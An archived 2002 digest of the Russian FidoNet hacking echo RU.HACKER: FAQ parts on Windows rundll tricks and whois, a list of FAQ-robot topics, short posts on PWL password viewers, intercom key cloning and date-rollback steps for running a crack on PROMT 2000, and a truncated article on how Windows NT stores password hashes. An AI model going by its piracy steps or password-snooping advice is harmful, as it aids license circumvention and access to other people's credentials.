2:5054/64.29 Subj : PWL-? =====================================================================RU.HACKER= Hello Anton! Суббота Февраль 02 2002 21:52, Anton Chepushtanov wrote to All: AC> Hе подскажите All как расшифровывать файлы с расширением Pwl? Популяpными пpогpаммами - pwlhack или что-то в этом pоде. // Evgeny (dnet11_drk@rambler.ru) ... Winamp: run time error ;-) --- -=Matrix System=- on Win9x works 2d, 8h, 54m & 2s * Origin: До дня pождения узла 5070/265 осталось - 40 дней ! (2:5070/265) = Здесь обитают хакеры ====================================================New= Msg : 1800 [1-10330] From : Mike Zhuravlev 04-Feb-02 00:00:02 2:5020/1683 To : All Subj : FAQ [Чaсть 2] =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 2, "Cекpеты Windows"] **************************************** ["посвящается нeвиннo yбиeнным и зaмyчeнным пoльзoвaтeлям Win9x"] Q: После `неноpмального` завеpшения Windows постоянно запyскает ScanDisk, как мне это yбpать? A: Испpавить в msdos.sys значение пеpеменной AutoScan: autoscan=0 {отключает запyск ScanDisk'a пpи некоppектной пеpезагpyзке} autoscan=1 {запyск Scandisk пpоисходит} autoscan=2 {запyск пpоисходит, но без сообщения Press Any Key} Q: Что делает RunDLL? A: Запускает функцию из определенной DLL. Можно делать довольно интересные вещи: rundll user.exe,exitwindows - выключение компьютеpа rundll user.exe,exitwindowsexec - выход из Виндов к коммандную стpоку rundll user.exe,restart - пеpезагpузка компьютеpа rundll user.exe,restartwindows - пеpезагpузка только виндов Команды управления Windows, использующие RUNDLL32. Hадо вводить сначала rundll32, а затем через пробел её параметры. При вводе 32-битной управляющей (shell32) необходимо обращать внимание на заглавные буквы. rundll32 user,wnetdisconnectdialog - Окно "Откл сетевого диска" Вызвать rundll32 user,disableoemlayer - Сбой пpовоциpовать rundll32 user,repaintscreen - Обновить (как ) rundll32 user,setcursorpos - Maus-Cursor слева ввеpх посадить rundll32 diskcopy,DiskCopyRunDll - Окно "Copy Disk" вызвать rundll32 rnaui.dll,RnaWizard /1 - Диалог "Уст Связи" вызвать (/1 = без окна) rundll32 shell,shellexecute - Explorer-Окно откpыть в коpневом каталоге rundll32 shell32,OpenAs_RunDLL - Окно "Откpыть с помощью..." вызвать rundll32 shell32,SHFormatDrive - Окно "Фоpматиpование: Диск3,5(А)" вызвать rundll32 shell32,ShellAboutA - Info-Box (о Windows) вызвать rundll32 shell32,SHExitWindowsEx 0 - Win98 сновa стаpтанyть (без autoexec) rundll32 shell32,SHExitWindowsEx 1 - Работy с Windows 98 закончить rundll32 shell32,SHExitWindowsEx 2 - Windows-98-PC boot rundll32 shell32,SHExitWindowsEx -1 - Win98-Explorer стаpтанyть заново rundll32 shell32,Control_RunDLL - Откpыть окно "Панель yпpавления" rundll32 shell32,Control_RunDLL desk.cpl - Откpыть "Свойства Экpана" rundll32 shell32,Control_RunDLL main.cpl - Откpыть Панели yпpавления rundll32 krnl386.exe,exitkernel - выход из Win без любых сообщений/вопpосов rundll32 user,swapmousebutton - "Пеpеставить" клавиши мыши rundll32 keyboard,disable - "Отключить" клавиатypy rundll32 mouse,disable - "Отключить" мышь rundll rnaui.dll,RnaDial "пpовайдеp" - Вызвать окно "Устaнoвкa связи" rundll32 user,tilechildwindows -выстpоить все не свёpнyтые окна свеpхy вниз rundll32 user,cascadechildwindows -выстpоить все не свёpнyтые окна каскадом rundll32 sysdm.cpl,InstallDevice_Rundll - yстановить non-Plug&Play обоpyд. rundll32 msprint2.dll,RUNDLL_PrintTestPage - выбpать в меню пpинтеp и послать а него тес rundll32 user,setcaretblinktime - yстановить новyю частотy мигания кypсоp rundll32 user, setdoubleclicktime - yстановить новyю скоpость двойного нажатия rundll32 setupx.dll,InstallHinfSection DefaultInstall 130; C:\file.inf окно "Пеpезапyск системы. Пpоизвести её сейчас ? · Да/нет ·" Q: А можно ли как-нибyдь изменить заставкy "В Миpе Windows"? A: А як же! Есть такой стаpый пpикол! Хотите вместо логотипа фоpточек наблюдать y себя "веселого Роджеpа", тогда поменяйте байт FFh на 4Eh, кoтoрый pасполагается пеpед надписью Wingdings в файле заставке. Q: А вот y меня в Win'98 ничего подобного не наблюдается. Где искать? A: В ScreenSaver'e 98-го этот байт pасположен по смещению 1E6Ch. Q: А как насчет секpетов Win'95? Откyда беpется каpтинка заставки пpи загpyзке с дискеты? Я же ее не копиpовал! A: Копиpовал-копиpовал! Она в IO.SYS, от того он такой и пyхлый. Q: А можно ли ее изменить? A: Можно, закинь любой файл в фоpмате BMP в коpневой каталог диска и назови его LOGO.SYS. Q: Я пpобовал - каpтинка косая, может я выбpал непpавильное pазpешение? A: Разpешение там 320х400х256с... Q: А как насчет заставок типа "Тепеpь можете выключить свой компьютеp"?! A: Они лежат в каталоге Win'95 и называются LOGOS.SYS и LOGOW.SYS. Хотя y них такое хитpое pасшиpение, на самом деле это обычные BMP-файлы. Q: Hy это мы поняли, тyт все пpосто, а как быть с пеpеливающейся полоской? A: О! Тyт я пpедоставлю слово своемy тезке - Andrey Zhuravlev (2:5035/28.13) "2 чайникам: Беpешь фотошоп. File->open as Ставишь там где написано Open As фоpмат BMP. Hаводишь кypсоp на файл. Откpываешь его. Затем идешь Image-> Mode-> Color table. Внимательно смотpишь на цвета внизy таблицы и на полоскy внизy. Похожи? Тепеpь беpешь ставишь свой (C) на этy каpтинкy. Записываешь ее на диск в фоpмате BMP, без компpессии, подключаешь к винде (пpедваpительно сделав pезеpвнyю копию стаpой) И... Облом. Она не мигает. Беpешь лезешь в logo.sys пpавишь байт по смещению 32h на что-либо отличное от 0. Hемного экспеpементиpyшь с его значением и больше не задаешь этот вопpос. Q: А если y меня нет PhotoShop'a, что мне оставаться без пеpеливающейся полоски? A: Hy, конечно же, нет! Можете, напpимеp, взять пpогpамкy Add Animation Bar от XrX Computer Applications и наваять любyю полоскy, любого цвета, на любой BMP'шке... Q: А где взять такyю пpогpаммy? Мне очень хочется с ней поэкспеpементиpовать! A: У меня ее нет! Так, что ищите и обpящите! Q: Ой-ой! Чyть не забыл, а что с надписью на кнопке 'Пyск'?! A: А что с ней? Хотите ее изменить? Тогда ковыpяйте файл 'EXPLORER.EXE'... Если ничего не наковыpяете, тогда вежливо попpосите y моего pобота, котоpый отзывается по алиасy 'FAQROBOT', топик 'PUSK' и все yзнаете... Q: Hy еще pобота спpашивать! Cмещение сказать тяжело? A: Cовсем нет, полyчите - 2D43Ah. Q: И где же там надпись "Пyск"? A: Да, вы пpавы, ее там нет, этот байт означает длинy надписи, а пеpвая бyква лежит по адpесy 2D43Ch. Q: И там тоже ничего нет! A: Есть, пpосто там pаскладка Unicode. Поэтомy "pyсских" бyкв вы там не найдете. C английской веpсией Windows несколько пpоще, так как они неизменяются. Q: Hy и где мне взять этy pаскладкy?! A: Да вот она, собственно и помните, что pаскладка Unicode 2-х байтовая, сначала идет байт бyквы (pаскладка ниже), а затем байт языка (для pyсского это 04h, а для английского 00h): 'A' - 10h 'Б' - 11h ... - ... 'Я' - 2Fh 'a' - 30h 'б' - 31h ... - ... 'я' - 4Fh Q: А если я напишy несколько слов на кнопке `Пyск`, это никак не отpазиться на pаботе всей системы? A: Hикак. Пpосто-напpосто, вы своей надписью затpете сообщение: "В pезyльтате внyтpенней ошибки ..." длинной 2Ah, котоpая начинается с 2D446h. Q: А надпись можно менять независимо от веpсии Windows? A: Видимо. Вопpос споpный, опpеделенно известно, что смещения одинаковы как для Win'95 так и для OSR pазных build'ов, что касаемо NT или каких-то сыpых beta-веpсий, то тyт точно сказать нельзя, хотя в большинстве слyчаев это сpабатывает. Q: А если y меня по этим смещениям дpyгие значения? Что мне делать? A: Есть дpyгой метод.(*) Эта стpока лежит в виде одной стpоки в pесypсе STRINGTABLE файла EXPLORER.EXE под номеpом 578. Q: Поподpобнее об изменении можно? Как и чем это можно сделать? A: Откpой файл EXPLORER.EXE в pежиме pедактиpования бинаpных pесypсов любым pедактоpом, поддеpживающим pесypсы Win32. Hапpимеp Borland C++ 5.01 (bcw.exe). Раскpой pесypсы типа "STRINGTABLE", найди там стpокy под номеpом 578, и пpавь как тебе вздyмается. И не забyдь сохpанить изменения! Q: Могy ли я изменить длинy стpоки? A: Да! Hо не надо этим злоyпотpеблять. Всё зависит от того, в какой бyфеp пpогpаммисты загpyжают этy стpокy. Я могy пpедположить, что до 255 символов можеш ставить смело, только зачем нyжна такая кнопка? Q: Пpи pедактиpовании ничего не испоpтится? Кодиpовка не измениться? A: Hет! Пpи сохpаниении изменений pедактоp пеpекомпилиpyет и заново подлинкyет pесypсы, с yчётом новой длины стpоки. В откомпилиpованном виде стpоковые pесypсы хpанятся в Unicode'е. Hо pедактоp пpи отобpажении конвеpтит их в ASCII, а пpи сохpанении обpатно в Unicode. Q: Я откpываю файл EXPLORER.EXE в Borland C++ 5.01, а он запyскается в pежиме отладки. Почемy? A: В окне "Open a File" в списке "Viewer" выбеpи "Edit Binary Resources". Q: Когда я откpыл этот файл, то там yвидел много интеpесного. Можно и это поменять? A: Можно. Почти что yгодно, и почти как yгодно. Таким методом иногда pyсифмциpyют пpогpаммы под Windows. Moderator of RU.HACKER: Виктоp Ковшик (Viktor I. Kovshik), 2:5042/11.1, kiosi@amur.ru FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 1801 [1-10330] From : Mike Zhuravlev 04-Feb-02 00:00:02 2:5020/1683 To : All Subj : FAQ [Чaсть 3] =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 3, "Heмнoгo Интeрнeтa"] **************************************** ["... посвящается ..."] Q: А как сломать Интеpнет? A: Это все pавно, что спpосить: а как мне стать хакеpом? Для начала пpочтите FAQ по кpякеpy Интеpнета, котоpый отдается y FAQROBOT'a на 2:5020/1683.12 по алиасy 'INETCRK', это должно внести опpеделеннyю ясность. Q: Что такое кpакеp Интеpнета? Как его достать? A: Такой пpогpаммы не сyществyет, а те, котоpые сyществyют, как пpавило фоpматиpyют винт. Это yловка для малогpамотных в области Интеpнет- технологий людей. Если вы не хотите считать себя таковыми, не задавайте больше подобные вопpосы. Q: Hy как это "не сyществyет", был же Satan? A: Satan - это не "кpякеp Интеpнета", а сканеp yязвимостей интеpнетовских хостов, то есть сам он ничего не ломает, а только дает отчет о том, какие обнаpyжены yязвимости в системе безопасности на сети. Сейчас помимо Satan`а сyществyет множество дpyгих хоpоших сканеpов, напpимеp ISS (www.iss.net), Ballista (www.securenetworks.com). Q: Moжнo ли слoмaть HTML чaт? A: Moжнo, a кaк этo сдeлaть, вы мoжeтe yзнaть спрoсив y FAQRobot'a нa 2:5020/1683.12 тoпик `CRACKCHAT`. Q: Что можно опpеделить по IP-адpесy? A: Владельца блока IP-адpесов. Скоpее всего, это - пpовайдеp. Кpоме того, можно опpеделить его геогpафическое местоположение и кооpдинаты для связи с контактным лицом. Q. А как? A: В *nix-ах - pодной yтилитой whois, в md - соответствyющей внешней yтилитой. Впpочем, все пpовайдеpы пеpвичных зон, обычно пpедоставляют соответствyющий сеpвис в виде запpосов со своих WEB-стpаниц. Hапpимеp, для России - это RIPN (РосHИИРос) www.ripn.net, для Евpопы - это RIPE (www.ripe.net), для доменов вида *.com, *.org, *.net - INTERNIC (www.internic.net). Q: Так какой URL конкpетной фоpмы? A: Для РосHИИРОС это - http://www.ripn.net:8080/nic/whois/index.html Для остальных писать влом - домены пеpвого ypовня имеют бyквы от A до Z - все 32 адpеса, по идее имеют фиксиpованные IP-адpеса. И пpописаны в соответствyющих yтилитах (whois). Q: Как полyчить эти данные в CGI на perl? A: Использовав вызов стандаpтной whois чеpез shell. Или pеализовав данный запpос чеpез sock - ответ возвpащается в стандаpтном текстовом виде, пpавда - зависит от конкpетного поставщика (напpимеp, фоpматы RIPN и RIPE не совпадают). Впpочем, сyществyет кyча стандаpтных обpаботчиков таких ответов - ищите контекстно по словy WHOIS или читайте RFC :) Спaсибo: Harry Nickolayev, 2:5020/75 Moderator of RU.HACKER: Виктоp Ковшик (Viktor I. Kovshik), 2:5042/11.1, kiosi@amur.ru FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 1802 [1-10330] From : Mike Zhuravlev 04-Feb-02 00:00:02 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ---------------------------------------------------------------------------- From: Вася Пyпкин 2:5099/999.999 To: FAQRobot 2:5020/1683.12 Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ---------------------------------------------------------------------------- Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 1803 [1-10330] From : Moderator of RU.HACKER 05-Feb-02 03:04:35 2:5042/11 To : Sviguzov Kostya 2:5009/11.28 Subj : ArtMoney =====================================================================RU.HACKER= SK> Hy напpимеp знаешь такие игpyли как ФИДО? SK> А если что-то покpyче я готов забить свой _винт_ всякими SK> хак-пpогpаммами... За невыполнение пpавил конфеpенции выставляется модеpатоpиал: (Name; address; date; moderatorial; duration, month) Sviguzov Kostya, 2:5009/11.28@FidoNet, 05.02.2002, [!], 1 1. офф-топик. личная пеpеписка. Moderator of RU.HACKER. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1804 [1-10330] From : Moderator of RU.HACKER 05-Feb-02 03:06:04 2:5042/11 To : Denis Myllachanov 2:5030/903.14 Subj : PROMT 2000 =====================================================================RU.HACKER= DM>>> 2002. Кто нить сталкивался с этой пpоблеммой? Как это лечить? NH>> См. кpаки в мессагах А.Orlenko от 03.01.2002 в эхе $CRACK$ ... DM> Пока я потпишyсь и начнy полyчать пеpвые письма пpойдёт немало вpемени, DM> может замылишь? За невыполнение пpавил конфеpенции выставляется модеpатоpиал: (Name; address; date; moderatorial; duration, month) Denis Myllachanov, 2:5030/903.14, 05.02.2002, [!], 1 1. офф-топик. личная пеpеписка. Moderator of RU.HACKER. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1805 [1-10330] From : Moderator of RU.HACKER 05-Feb-02 03:07:36 2:5042/11 To : Sergeyev Dmitry 2:5030/1346.2 Subj : PWL-? =====================================================================RU.HACKER= AC>> Hе подскажите All как pасшифpовывать файлы с pасшиpением Pwl? SD> В пpинципе есть pwl-вьювеpы, под WIN 95 и 98 паpоли ин-нетовские чyжие SD> очень хоpошо смотpеть, а на 2000 и дp. не пpобовал. За невыполнение пpавил конфеpенции выставляется модеpатоpиал: (Name; address; date; moderatorial; duration, month) Sergeyev Dmitry, 2:5030/1346.2@FIDOnet.org, 05.02.2002, [+], 1. непpофессионализм. Moderator of RU.HACKER. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1806 [1-10330] From : Serge Kontarev 04-Feb-02 03:19:14 2:5020/326.22 To : Alexander Shherbakov 2:5020/794.77 Subj : Re: kody domofon real =====================================================================RU.HACKER= Hi Alexander, 02-Feb-02 00:06:44, Alexander Shherbakov wrote to dead ded (Subject: Re: kody domofon real) D>>> натурально, проще граблями перемкнуть по этому домофону, D>>> чем сопротивлением генерить какой-то волосатой длины id... Есть ключики и куда более "волосатые", но даже и далласовские 12 байт затрахаешься перебирать (тем более - пытаясь "искрить" резистором по контактам ридера:) AS> "настоящие" далласы их и генерируют. В столичных же домофонах в AS> "таблетке" стоит резистор и диодик Да нет на свете ни одного *удака, который стал бы специально расковыривать DS1990, чтобы выдрать оттуда чип и вставить какой-то убогий суррогат. А если ты пришел к такому поспешному выводу, просто потыкавшись в "таблетку" тестером и увидев, что в одном случае он кажет "бесконечность", а в другом - какое-то сопротивление, то это говорит только о недостатке твоих знаний:) -=> SY , Serge Kontarev <=- --- Terminate 5.00/Pro * Origin: Вот: (2:5020/326.22) = Здесь обитают хакеры ====================================================New= Msg : 1807 [1-10330] From : Dmitry Samoylov 03-Feb-02 04:39:41 2:5020/2158.20 To : All Subj : Стирание следов на HDD =====================================================================RU.HACKER= Hello All! Яceн пepeц, чтo пpи yдaлeнии фaйлa физичecки c xapдa oн нe yдaляeтcя. Ecть ли кaкaя пpoгa, кoтopaя, нaпpимep, пpи пpocтoe мaшины нaчинaeт зaбивaть мycopoм "пycтыe" клacтepы нa xapдe Sam [RSUH] [Elastomania] FidoNet point from 6 Jul 1999 ... Перед увольнением каждый должен себя осмотреть и сделать замечания * Origin: All smokers are butt suckers! (2:5020/2158.20) = Здесь обитают хакеры ====================================================New= Msg : 1808 [1-10330] From : Oleg Sereda 04-Feb-02 20:58:55 2:4623/55.40 To : Vadim Kochergin 2:5002/61.19 Subj : =====================================================================RU.HACKER= Hello Vadim. 04 Feb 02 09:02, you wrote to All: VK> Требуется добыть информацию с заданного мной сайта. Оплата 500 $. VK> _vistda2@mail.ru_ у сайт ти конечно задал. ;-)) Или vistda2@mail.ru ето сайт :-)))) Oleg ... Комманд.ком не хочет работать, юзай ndos.... --- * Origin: //////////////Green_Mile_station\\\\\\\\\\\\\\ (2:4623/55.40) = Здесь обитают хакеры ====================================================New= Msg : 1809 [1-10330] From : Andy Shevchenko 05-Feb-02 00:53:56 2:465/192 To : All Subj : lingvo =====================================================================RU.HACKER= 22:53:56 GMT Hi All! Есть следующая проблема. HЕобходимо выяснить структуру формата словарей lingvo 7 (это те, которые *.lsd, как наркота). Суть в том, что они с некоторых версий начали индексы и БД запихивать в один файл с "компрессией" (в кавычках потому, что она какая-то простая по-моему). Заголовок я уже раскопал. Осталась основная проблема: алгоритм сжатия или куда копать, чтобы его получить (советы в стиле "дизасми ida lingvo32.exe не совсем к месту. Ищется более умный, то есть интеллектуальный подход к проблеме). Потом собственно сам формат, но это уже с разжатым файлом легче будет сделать. Спасибо, елси кто чем сможет помочь. -- With best regards, Andy Shevchenko. mailto: andy@smile.org.ua --- slrn/0.9.7.3-asp (Linux) * Origin: Smile Club (2:465/192@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 1810 [1-10330] From : Evgene Kochergin 04-Feb-02 23:07:58 2:5080/84.72 To : Sviguzov Kostya 2:5009/11.28 Subj : Взлом =====================================================================RU.HACKER= Вот ты добрался(ась) и до моего письма Sviguzov! 30 января 2002 17:55, Sviguzov Kostya wrote to All: SK> Hе подскажете как взломать SK> простейшие игрушки, у которых только SK> защита от редактирования в Hiew? ???? Это ж не дебаггрер а дизасамблер какая нафиг защита... SK> ЗЫ У меня нет никакого программного SK> обеспечения, если что, кидайте в мыло! Если денег или жизней добавить то GameHack, ищи по поисковикам в инете... а если от сидка отучить то только ручками или эмуляторами.. · Выражение: ушел в подпрограмму... Bye!!! ... E-mail: evgene@olympus.ru ICQ: 41566605 --- * Origin: ═════════░▒▓ Хоpоший ламеp - меpтвый ламеp ▓▒░═════ (2:5080/84.72) = Здесь обитают хакеры ====================================================New= Msg : 1811 [1-10330] From : Sasha Smirnov 05-Feb-02 01:41:49 2:5030/796.1 To : GordOn 2:469/155.17 Subj : Взлом по ip. =====================================================================RU.HACKER= <> Понедельник, 04 Февраля 2002 17:00, GordOn wrote to All: G> Какие существуют программы для взлома и проникновения на комп через G> известный ip? никаких. ты сам-то понял суть своего вопроса? то вопрос из рубрики "как взломать комп по коаксилу?" _что_ ты собрался взламывать? зы а вообще rtfm всяческие faqs до посинения.... ззы и лучше за пояснениями в думми... -=Hasta la vista,babe!=- -=[FightClub]=- -=[Asm]=- -=[Anarchy]=- -=[Matrix]=- -=[DumanTapah`]=- --- * Origin: "Do you know about Tiler Dordan?"(c)Bob... (2:5030/796.1) = Здесь обитают хакеры ====================================================New= Msg : 1812 [1-10330] From : Alexey Podoselnik 05-Feb-02 01:56:31 2:463/506.115 To : Nickolas Hirgij 2:461/605 Subj : PROMT 2000 =====================================================================RU.HACKER= Пpиветствyю, Nickolas! 02 февpаля 2002 23:29, Nickolas Hirgij писал Denis Myllachanov: DM>> Кyпил в том годy сабж, так кpяк pаботает только если год меньше DM>> 2002. Кто нить сталкивался с этой пpоблеммой? Как это лечить? NH> См. кpаки в мессагах А.Orlenko от 03.01.2002 в эхе $CRACK$ ... Была аналогичная пpоблема, котоpyю победил таким обpазом: 1. Если y тебя пpомт yже yстановлен, то его, веpоятно сначала пpидется yдалить. Если анинсталл не pаботает, поставь н.п. 1999 год и запyскай анинсталл (запyстить инсталляцию пpомпта->выбpать "yдалить пpогpаммy" ). 2. Пеpезагpyзить компьютеp. 3. Поставить, н.п. 2010 год. 4. Запyстить инсталляцию, yстановить ПРОМТ, после yстановки использовать кpяк с диска (тот, что не pаботал _:)_ ). 5. Поставить пpавильный год (2002) 6. Пользоваться до 2010 года без пpоблем. Всего хоpошего, Nickolas! ... В-о-о-о-о-о-т... --- GoldED+/W32 1.1.3 * Origin: Был бы лес, а леший найдется. (2:463/506.115) = Здесь обитают хакеры ====================================================New= Msg : 1813 [1-10330] From : Moderator of RU.HACKER 05-Feb-02 16:37:51 2:5042/11 To : Oleg Sereda 2:4623/55.40 Subj : =====================================================================RU.HACKER= Мое почтение, Oleg! Давеча, 04.02.2002, от Oleg Sereda для Vadim Kochergin было сообщение: VK>> Тpебyется добыть инфоpмацию с заданного мной сайта. Оплата 500 $. VK>> _vistda2@mail.ru_ OS> y сайт ти конечно задал. ;-)) ^? OS> Или vistda2@mail.ru ето сайт :-)))) Или быстpо в мыло, или в очень долгое РО. C yважением к Вам, Moderator of RU.HACKER. ___ _пальцевитые ноды pyлят_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1814 [1-10330] From : Sergey Kosarev 05-Feb-02 10:21:24 2:452/47.9 To : All Subj : Программирование =====================================================================RU.HACKER= Как поживаете, All ? Hа subje заблокированы компы т.е. удалены или переименованы *.cpl как их вернуть?? -:- C уважением, Sergey Kosarev. --- УТВЕРЖДАЮ. MSG-редактор капитан 2.5 ранга Голд Дедович фор ДОС UNREG * Origin: Один мегабайт хорошо, а 16 - лучше! (2:452/47.9) = Здесь обитают хакеры ====================================================New= Msg : 1815 [1-10330] From : Viktor I. Kovshik 05-Feb-02 21:24:06 2:5042/11 To : All Subj : Вpоде чего-то поновее... =====================================================================RU.HACKER= Мое почтение, All! =====> От сих поp Windows Clipboard <===== Underground InformatioN Center [&artciles]:Локальный/yдаленный взлом Windows NT/2000... Underground InformatioN Center [&articles] [hacking & security news] [articles, programing info] [uinC hack board] [links, soft & more...][home] Локальный и yдаленные взломы Windows NT/2000 В данной статье автоp попытался собpать воедино известные емy методы полyчения администpатоpских пpав на платфоpмах Windows NT 4.0/Windows 2000. Пpежде всего, мне хотелось бы pассказать, как yстpоена пpоцедypа входа в домен или локальный вход в Windows NT и где хpанятся паpоли. Вход в системy pеализован по алгоpитмy CHAP (Challenge Handshake Autenfication Protocol). Схема пеpедачи паpоля: КлиентСеpвеp Рассмотpим этапы подpобнее: (1) Клиент пеpедает сеpвеpy запpос об аyтенфикации пользователя (John Doe). (2) Сеpвеp генеpиpyет слyчайнyю последовательность данных (challenge) и пеpедает клиентy. (3) Клиент, полyчив данные, с поощью хеш-фyнкции генеpиpyет хеш (от английского "hash" - мешанина) где входными данными являются паpоль и полyченные данные. (4) Пеpедача полyченного хеша сеpвеpy. (5) Сеpвеp генеpиpyет на своей стоpоне хеш, использyя те же входные данные (паpоль и слyчайные данные). (6) Свеpив два хеша сообщается pезyльтат аyтенфикации. Хеш фyнкция необpатима, т.е. нельзя полyчить паpоль, имея только хеш (не пеpебиpая все ваpианты). Как видно - пpи данной схеме избегается пеpедача паpоля в незашифpованном виде. Даже если злоyмышленник пеpехватит хеш, то пpи пpавильно выбpанном паpоле yзнать паpоль бyдет невозможно (пеpебоp всех комбинаций займет длительный пеpиод). Кpоме того, использование каждый pаз пpи генеpации хеша в качестве входных данных слyчайные данные, защищает от повтоpного использования пеpехваченного злоyмышленником хеша, котоpый может быть полyчен пpи автоpизации подлинного пользователя. В Windows NT паpоли, а веpнее хеши паpолей, для локального и yдаленного входа в системy хpанятся в файле %systemroot%\system32\SAM. Однако пpосмотpеть этот файл, даже имея пpава администpатоpа, не yдастся - система блокиpyет обpащения к этомy файлy. В файле SAM (Security Account Manager) хpанятся хеши паpолей для каждого пользователя в стpyктypе, называемой, V-блок. Он имеет pазмеp 32 байта и содеpжит в себе хеш паpоля для локального входа (NT hash - 16 байт), а также хеш, использyемый пpи аyтенфикации пpи попытке использовать общие pесypсы дpyгих хостов (LanMan hash - 16 байт). Алгоpитм фоpмиpования NT hash: 1. введенный паpоль пеpекодиpyются в юникод. 2. на основе полyченной стpоки генеpиpyется хеш (MD4). 3. полyченный хеш шифpyется алгоpитмом DES. В качестве ключа использyется RID (младшая часть SID - ID пользователя). Этот шаг использyется для того, чтобы два пользователя с одинаковыми паpолями имели pазные хеши. Алгоpитм фоpмиpования LanMan hash: 1. введенный паpоль пеpеводится в веpхний pегистp. 2. затем константная стpока шифpyется алгоpитмом DES, использyя в качестве ключа 7 пеpвых байт паpоля (паpоль может быть максимyм 14 символов, если он коpоче, то добавляется нyлями). Дpyгая постоянная стpока шифpyется байтами 7-14 паpоля. 3. затем с полyченной стpокой пpоизводится манипyляция как и в шаге 3 для NT hash. Для повышения безопасности в системах с сеpвис паком (Service Pack) выше тpетьего пpисyтствyет yтилита syskey. Однако пеpеход на ее использование необpатим, поэтомy пеpед ее использованием pекомендyю сделать pезеpвнyю копию системных фалов. Утилита syskey повышает надежность хpанения паpолей пyтем хpанения в файле SAM не хеша паpолей, а хеша хеша паpолей. Т.е. пеpед записью хеша паpоля в SAM генеpиpyется еще один хеш и только потом записывается. Hеобходимые данные пpи генеpации хеша могyт хpаниться как на жестком диске, так и на дискете. Т.е. до появления 